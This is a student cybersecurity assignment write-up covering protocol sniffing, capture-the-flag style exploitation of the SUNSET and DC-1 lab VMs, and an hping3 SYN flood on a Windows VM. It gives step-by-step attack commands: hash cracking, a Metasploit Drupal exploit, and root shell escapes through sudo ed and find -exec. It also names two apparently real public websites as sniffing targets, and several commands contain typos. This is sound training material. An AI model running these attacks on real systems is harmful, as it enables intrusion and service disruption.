ASSIGNMENT-4

Objective: The objective of Task 4 is to enhance practical understanding and skills in

network security and penetration testing through three key activities: sniffing vulnerable
protocols, server hacking, and performing a Denail of service.(DoS)attack. The goal is to
identify websites using insecure protocols(HTTP,FTP,POP) to demonstrate the risks
associated with unencrypted data transmission, exploit vulnerabilities in target severs to
uncover hidden flags and reinforce the importance of securing server configurations, and
execute a DoS attack to understand its impact on system performance and the necessity of
robust defensive measures. These tasks aim to provide hands-on experience with real-world
cybersecurity threats and defenses.

A. Sniffing-Identify the websites that have vulnerable protocols to

sniff.

Sniffing:- Sniffing refers to the process of monitoring and capturing data packets as
they travel across a network. This can be done using software tools known as packet
sniffers or network analyzers. Sniffing is often used by network administrators for
monitoring and troubleshooting network traffic, ensuring security and analyzing
performance.

Wireshark:- Wireshark is a widely-used network protocol analyzer that allows users to

capture and interactively browse the traffic running on a computer network. It
provides detailed information about network packets, making it an essential tool for
network troubleshooting, analysis , software and protocol development and education.

➢ HTTP: It is a foundational protocol used for transmitting data over the web. It
defines how messages are formatted and transmitted, and how web servers and
browsers should respond to various commands. Http operates primarily at the
application layer, supporting methods like GET and POST to retrieve and send data
respectively.

Site:- olasms.in
➢ FTP : FTP is a standard network protocol used to transfer files from one host to
another over a TCP-based network such as the internet. It operates on a client-server
model where the client initiates a connection to the server to upload or download
files .
Site:- enic.pk
➢ POP : POP are early versions of the post office protocol, used by email clients to
retrieve messages from a mail server. Both protocols were fundamental in the
development of email communication but have since been replaced by more
advanced versions, most notably pop3.

Site:- enic.pk
Conclusion:- In this task, the websites enric.pk and olasms.in were analyzed for their use of
insecure protocols such as POP,FTP and HTTP. Using tools like wireshark, it was found that
these websites transmitted sensitive information in plaintext. This highlighted the significant
risks associated with unencrypted data transmission and underscored the necessity of
adopting secure protocols like HTTPS and FTPS to ensure data protection.
B. Server Hacking – Crack the servers and find the flags
➢ Exploit the SUNSET server
1. Open supraja downloads folder
2. Open server hacking folder and extract it
3. Double click on the SUNSET ova
4. It opens Virtualbox and a popup appears click on import
5. Check whether the SUNSET is in NAT network or not
6. Click on power on this machine

7. Start parrot os also

8. We need to find the ip address of the SUNSET server

Command:- sudo netdiscover
9. Now we have found the ip address fo the SUNSET SERVER
IP:- 10.0.2.15
10. We need to find the open ports and OS by using nmap
Command: nmap -A 10.0.2.15

11. Now we have found a vulnerability know as ftp anon

Command: ftp 10.0.2.15
Username: Anonymous
Password:
12. We are inside the sunset server now we need to find the flag.
13. Now we have seen a backup file so we are getting that file into our parrotos
Command: ls
Command: get backup

14. Now we have the backupfile in Parrotos.

15. Now look at the content inside the backupfile

Command: cat backup
16. Now take the sunset hash value and keep it in a notepad (or) pluma
Command: pluma hash

17. Now we need to crack the hash by using john the repear
Command: john hash

18. Now we are going to see the plain password

Command: john hash –show

19. Now we are going to connect by using ssh. We also know password
Command: ssh sunset@10.0.2.15
Password: cheer14
20. Now we are going to see inside so we use ls
Command : ls
We have a user file inside it so we are going to see the content.
Command: cat user

21. We have found first flag now we are going to find second flag were we need to be root
user.
Command: sudo -l
Command: sudo /usr/bin/ed
Command: ! /bin/sh
Command: cd/root
Command: ls
Command: cat flag.txt
 22. Now we have founded all the flags in the SunSet server.

➢ Exploit the DC -1 server

1. Open supraja downloads folder
2. Open server hacking folder and extract it
3. Double click on the DC-1 ova
4. It opens Vmware and a popup appears click on import
5. Check whether the DC-1 is in NAT network or not
6. Start DC-1 server
7. We don’t know credentials of the server .
8. Start kali linux also

9. Give credentials of the kali linux

10. Now the kali linux will be the attacker machine,and the server will be the victim
machine.
11. First we need to find the ip address of the servermachine so we are going to nmap
Command:- sudo nmap -T4 -sn 192.168.10.0/24
12. The ip address of the server is 192.168.10.136
13. Open any brower and paste ip on search bar
14. Now do an intense scan on the ip address we can find any vulnerabilities
Command: sudo nmap -A -O -T4 192.168.10.136
15. Use nmap scripts for enumeration for the open-ports for Http and SSH
Path for nmap scripts:- /usr/share/nmap/scripts/
Command:- sudo nmap -p 80,443 --script ssh brute.nse 192.168.10.136
Like that we need to use all the enumeration of the open ports.

16. But using enumeration we didn’t find any flags or to crack the server so we are
going to use “msfconsole” Metasploitable Framework.
Command:- msfconsole.
17. We are going to use a command to search the exploit after fully understanding
the outputs of the nmap we have found a vulnerability were we can go into
victim system. To do it we are using msfconsole .

18. The vulnerability of the victim machine is drupal which can have remote
connection to the server to find the vulnerability we are using a command called
search.
Command: search drupal

19. We are going to use 1 exploit so that we can get command remote connection to
the server .
Command: use 0

20. Now the payload is ready now we need to enter the victim machine ip address
and details to do that we use a command called show options.
Command: show options.
21. Now we are going to use set RHOST and TARGETURI so that the payload know
where to attack .
Command: set RHOSTS 192.168.10.136
Command: set TARGETURL 192.168.10.136

22. We have given all the details it required now we are going to exploit the victim
server by giving a command.
Command:- exploit

23. After that a session will open were we will be in the victim machine .
24. Now we are going to find the flags.
25. We are use same commands like kalilinux only.
26. Now we are goinglook at www inside var.
 27. In this folder we have found the first flag1.txt
Path: /var/www
28. We are going to look for clues for for flag2.txt by reading the flag1.txt.
Command: cat flag1.txt
meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you.

29. now we are going to find the config which is also known as settings.php . we are
going to use a command named cat to read the settings.php
Path:- /var/www/sites/defaults/settings.php
Command:- cat settings.php
30. we have found the flag 2 in settings.php. now we need to find the flag3
31. couldn’t find the flag three
32. the flag4 in home
path:- home/flag4/flag4.txt
command:- cd flag4
command:- cat flag4.txt

33. now we need to to previliage escalation to get the final flag

path tmp
command:- touch DC-1
for previliage escalation
command: find DC1 -exec “/bin/sh” \;
 34. after previliage escalation go to root
Command : cd /root
Command: ls
Command : cat thefinalflag.txt

So finally we found the finaflag in the server.

Conclusion: In this task, we exploited vulnerabilities in the SUNSET and DC-1 servers to
uncover hidden flags. Parrot OS was used for the SUNSET server and FTP exploits,
employing john the Ripper for password cracking. For the DC-1 server, kali linux was used,
leveraging “msfconsole” to identify and exploit vulnerabilities. Both servers were
successfully compromised, demonstating the effectiveness of penetration testing techniques
and underscoring the importance of regular security assessments and timely patch
management to secure server environments.

C. Perform a DOS attack on Windows 10 virtual Machine and check

the performance.

Now we are going to perform DOS attack on Windows 10 virtual machine by using kali
linux . where, victim machine is windows, attacker machine is Kali linux
To do Dos attack we are going to use hpin3.
1. We need to find the ip address of the windows 10 machine
Command: sudo netdiscover

2. Now we have the ip address of the macine 192.168.10.133 , now we are going find
the open ports to do the Dos attack to finds the ports we are using Nmap
Command: Nmap -T4 -A 192.168.10.133
3. Now we are going to do the attack by using hping3
Command: sudo hping3 -s –flo0d -V -p 80 192.168.10.133

4. Now we are going to see the packets that are sent to windows by using wireshark

5. Windows task manager.

This is how the Dos attack also going to happen in real life. To prevent it we must use
firewalls and all.

Conclusion: In this task, a Denial of Service (D0S) attack was performed on a windows
10 virtual machine from a kali Linux machine using the ‘hping3’ tool. A SYN flood attack
was executed, significantly degrading the performance of the target system. This exercise
illustrated the destructive potential of DoS attacks and highlighted the critical need for
robust network defense mechanisms, such as firewalls and intrusion detection systems, to
mitigate such threats

Summary: Assignment 4 focused on enhancing practical cybersecurity skills through

three key tasks. In Task 4A, wireshark was used to sniff vulnerable protocols
(POP,FTP,HTTP) on websites enric.pk and olasms.in, highlighting the risks of
unencrypted data transmission. Task 4B involved exploiting the SUNSET and DC-1
servers using ParrotOS and Kali Linux, respectively, with tools like john the Ripper and
msfconsole to uncover hidden flags, demonstrating effective penetration testing
techniques. Task 4c executed a Denial of Service(DoS) attack on a windows 10 VM from
kali Linux using ‘hping3’, illustrating the impact of SYN flood attacks and the
importance of robust network defenses. Overall, the assignment underscored the necessity
of secure protocols, regular security assessments, and strong defensive measures to
protect digital assets.